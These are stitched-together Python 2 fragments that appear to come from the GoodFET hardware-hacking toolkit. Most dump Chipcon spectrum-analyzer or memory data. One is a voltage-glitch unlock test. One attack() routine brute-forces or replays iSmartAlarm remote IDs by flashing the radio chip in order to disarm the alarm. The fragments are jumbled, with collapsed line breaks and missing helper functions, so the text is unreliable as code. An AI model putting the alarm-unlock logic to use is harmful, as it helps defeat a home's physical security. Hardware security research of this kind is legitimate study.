# ------------------------------------------------------------------------------ # | Marker | MSB Loop | LSB Loop | channel | channel | ... | channel | channel | # | 0xFE | Count | Count | number | rssi | ... | number | rssi | # ------------------------------------------------------------------------------ import sys; import Gnuplot as plt # sys.path.append('/Users/travis/svn/goodfet/trunk/client/') sys.path.append('/home/cutaway/Hardware/Goodfet/trunk/client/') from GoodFETCC import GoodFETCC; from intelhex import IntelHex16bit, IntelHex; import time; client=GoodFETCC(); client.serInit(); client.setup(); client.start(); client.CChaltcpu(); client.CCreleasecpu(); time.sleep(1); chanstart=0xf000; #maxchan=132; maxchan=53; round=0; g = plt.Gnuplot()
# GoodFET Chipcon Example # # (C) 2009 Travis Goodspeed <travis at radiantmachines.com> # # This code dumps the spectrum analyzer data from Mike Ossmann's # spectrum analyzer firmware. import sys; sys.path.append('/Users/travis/svn/goodfet/trunk/client/') from GoodFETCC import GoodFETCC; from intelhex import IntelHex16bit, IntelHex; import time; client=GoodFETCC(); client.serInit(); client.setup(); client.start(); bytescount=8*132; bytestart=0xf000; while 1: time.sleep(1); client.CChaltcpu(); dump=""; for foo in range(0,bytescount): dump=("%s %02x" % (dump,client.CCpeekdatabyte(bytestart+foo)));
# GoodFET Chipcon Example # # (C) 2009 Travis Goodspeed <travis at radiantmachines.com> # # This code dumps the spectrum analyzer data from Mike Ossmann's # spectrum analyzer firmware. import sys sys.path.append('/Users/travis/svn/goodfet/trunk/client/') from GoodFETCC import GoodFETCC from intelhex import IntelHex16bit, IntelHex import time client = GoodFETCC() client.serInit() client.setup() client.start() client.CChaltcpu() client.CCreleasecpu() time.sleep(1) bytestart = 0xf800 maxchan = 132 round = 0 print "time freq rssi"
# sys.path.append('/Users/travis/svn/goodfet/trunk/client/') sys.path.append('/home/cutaway/Hardware/Goodfet/trunk/client/') from GoodFETCC import GoodFETCC from intelhex import IntelHex16bit, IntelHex import time # Sleep Intervals in Seconds sshsi = 1 # one second shsi = 10 # 10 seconds mdsi = 60 # 1 minute lgsi = 120 # 2 minutes xlgsi = 1200 # 20 minutes client = GoodFETCC() client.serInit() client.setup() client.start() # Start and stop if previously something failed client.CChaltcpu() client.CCreleasecpu() # Map channel number to approximate frequency # 0 == 902 thru 52 == 928 with a step of .5 MHz max_chan = 53 # however 0 IS included, so 53 chan_dict = dict([(x, ((x * .5) + 902)) for x in range(max_chan)])
# GoodFET Chipcon Example # # (C) 2009 Travis Goodspeed <travis at radiantmachines.com> # # This code is being rewritten and refactored. You've been warned! import sys; import binascii; sys.path.append('/Users/travis/svn/goodfet/trunk/client/') from GoodFETCC import GoodFETCC; from intelhex import IntelHex16bit, IntelHex; client=GoodFETCC(); client.serInit(); client.setup(); client.start(); bytecount=0; lastcount=0; bytescount=64; bytestart=0x0C; bytes=[]; f="random.bin"; #sys.argv[1]; file = open(f, mode='wb')
def attack(attack_type): try: global ser global args byte = '1' #Initialize GoodFET serial port connection client = GoodFETCC() client.serInit() # Connect to GoodFET client.setup() # Initialize GoodFET client multiple times, this is due to poor JTAG latching client.start() client.start() client.start() client.start() # Open serial pipe to Arduino ser = serial.Serial(args.port, 9600, timeout=0) if attack_type == '0': clearscreen() id = 'FFFFFFFFFFFFFF0000000000070000FF' bytes = bytearray.fromhex(id) counter = 0 #38520 while True: if counter == 65535: break counter += 1 bytes[13:15] = unhexlify(offset(counter)) f = StringIO(data(32752, bytes) + '\n:00000001FF') print pink("IHEX:\n" + f.getvalue() + '\n') client.flash(f) f.close() client.stop() sleep(2.5) serialpoke(byte) sleep(0.6) client.start() print green( "[SUCCESS] All 65536 ID's have been exhausted, good day.") exit_clean() else: global src_id print green( "[SUCCESS] Source ID captured from iSmartAlarm remote or sensor, attempting unlock...\n" ) id = 'FFFFFFFFFFFFFF00000000' + src_id + 'FF' bytes = bytearray.fromhex(id) if attack_type == '2': raw_input('Press [ENTER] when ready to unlock:') else: print yellowbold( "[INFO] Delay mode enabled. Waiting %i seconds till unlock" % args.delay) sleep(args.delay) f = StringIO(data(32752, bytes) + '\n:00000001FF') print pink("IHEX:\n" + f.getvalue() + '\n') client.flash(f) f.close() client.stop() sleep(2.5) serialpoke(byte) sleep(0.6) print green("[SUCCESS] Hopefully unlocked :D") exit_clean() except Exception, e: print red("\n[ERROR] An error occured while flashing ID's\n\t%s" % e) exit_clean()
# # This code dumps the spectrum analyzer data from Mike Ossmann's # spectrum analyzer firmware. # # # import sys sys.path.append('/Users/travis/svn/goodfet/trunk/client/') from GoodFETCC import GoodFETCC from intelhex import IntelHex16bit, IntelHex import time client = GoodFETCC() client.serInit() client.setup() client.start() client.CChaltcpu() client.CCreleasecpu() time.sleep(1) bytestart = 0xf000 bytescount = 8 * 132 maxchan = 132 round = 0 print "time freq rssi rssimax"
import sys,binascii,time,random; sys.path.append('../../../trunk/client/') from GoodFETCC import GoodFETCC; from intelhex import IntelHex16bit, IntelHex; import sqlite3; #Database connection and tables. db=sqlite3.connect("glitch.db"); db.execute("create table if not exists glitches(time,vcc,gnd,trials,glitchcount,count)"); #Initialize FET and set baud rate client=GoodFETCC(); client.serInit() print "-- GoodFET EEPROM Unlock test." print "-- Count of reads with voltage glitch." client.start(); client.erase(); secret=0x69; #Erase chip for baseline. while(client.CCpeekcodebyte(0)!=secret): print "-- Setting secret"; client.start();
# # This code dumps the spectrum analyzer data from Mike Ossmann's # spectrum analyzer firmware. # # # import sys; sys.path.append('/Users/travis/svn/goodfet/trunk/client/') from GoodFETCC import GoodFETCC; from intelhex import IntelHex16bit, IntelHex; import time; client=GoodFETCC(); client.serInit(); client.setup(); client.start(); client.CChaltcpu(); client.CCreleasecpu(); time.sleep(1); bytestart=0xf000; bytescount=8*132 maxchan=132; round=0; print "time freq rssi rssimax";